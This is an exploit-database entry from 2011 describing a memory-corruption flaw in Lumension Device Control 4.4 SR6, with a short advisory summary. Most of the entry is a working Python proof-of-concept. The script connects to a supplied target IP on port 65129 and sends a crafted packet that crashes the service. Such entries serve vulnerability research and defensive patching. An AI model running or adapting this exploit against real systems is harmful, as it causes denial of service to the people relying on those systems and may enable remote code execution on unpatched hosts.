Lumension Security Lumension Device Control 4.x - Memory Corruption

2011-05-24T00:00:00
ID EXPLOITPACK:2CC1AE83B4154775A2E6EB8ADF52BDFB
Type exploitpack
Reporter Andy Davis
Modified 2011-05-24T00:00:00

Description

Lumension Security Lumension Device Control 4.x - Memory Corruption

                                        
                                            source: https://www.securityfocus.com/bid/47952/info

Lumension Security Lumension Device Control (formerly Sanctuary) is prone to a memory-corruption vulnerability.

An attacker can exploit this issue to cause a denial-of-service condition. Due to the nature of this issue, remote code execution is possible but has not been confirmed.

Lumension Device Control 4.4 SR6 is vulnerable; other versions may also be affected. 

#!/usr/local/bin/python

import sys
from socket import *
import os

if (len(sys.argv)!=2):
	print "\n--------------------------------------------------"
	print "Usage: %s <target IP>" % sys.argv[0]
	print "--------------------------------------------------\n"
	exit(0)

host=sys.argv[1]
port=65129

packet1 =  "\xec\x02\x00\x00"	#length of remaining packet
packet1 += "\xc9\x00\x00\x00"	#some kind of packet ID?
#packet1 += "\x18\x00\x00\x00"
packet1 += "\x61\x61\x61\x61"	#crash occurs here

packet1 += "\xc8\x02\x00\x00\xd4\xf8\x27\xe3\x51\xdf\xc9\x48\x82\xc3"
packet1 += "\xdb\x73\xbf\x42\xce\x77\xec\x00\x00\x00\x00\x00\x00\x00\x01\x00"
packet1 += "\x00\x00\x0d\xd8\x91\x32\x61\xf4\x43\xa1\xe1\x8e\x27\x68\x6d\xde"
packet1 += "\xbe\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x95\x00\x05\x01"
packet1 += "\x03\x00\x00\x03\x01\x10\x02\x00\x00\x00\x00\x00\x00\x00"
packet1 += "\x34\x2e\x34\x2e\x31\x34\x35\x32" #client version
packet1 += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet1 += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd6\x5e"
packet1 += "\xe0\x81\xdb\xd8\xcb\x01\xe4\x95\x45\xe1\xdb\xd8\xcb\x01\x7c\x99"
packet1 += "\x47\xbc\xdb\xd8\xcb\x01\xd6\xbc\xb0\x34\xdc\xd8\xcb\x01\x02\x00"
packet1 += "\x00\x00\x9c\x47\x57\x00\xd4\xf8\x27\xe3\x51\xdf\xc9\x48\x82\xc3"
packet1 += "\xdb\x73\xbf\x42\xce\x77\xec\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet1 += "\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
packet1 += "\xc0\xa8\x00\x6b" #client IP address
packet1 += "\xff\xff\xff\x00" #client subnet mask
packet1 += "\x61\x00\x63\x00\x65\x00\x72\x00\x2d\x00\x65\x00\x38\x00"
packet1 += "\x31\x00\x37\x00\x66\x00\x61\x00\x65\x00\x30\x00\x64\x00\x38\x00" # client hostname
packet1 += "\x00" * 480
packet1 += "\x00\x00\x40\xfc\xba\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80"
packet1 += "\x85\xcc\x23\x00\x00\x00\x80\xee\x36\x00\x93\x84\xde\x84\x02\x00"
packet1 += "\x00\x00\x00\x00\x00\x00"

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send(packet1)
print s.recv(1024)
s.close()